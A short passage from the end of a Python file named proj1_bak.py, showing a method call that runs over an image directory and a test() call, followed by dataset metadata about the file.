lf.run_image_dir()\n\ntest()\n","sub_path":"proj1_bak.py","file_name":"proj1_bak.py","file_ext":"py","file_size_in_byte":9028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}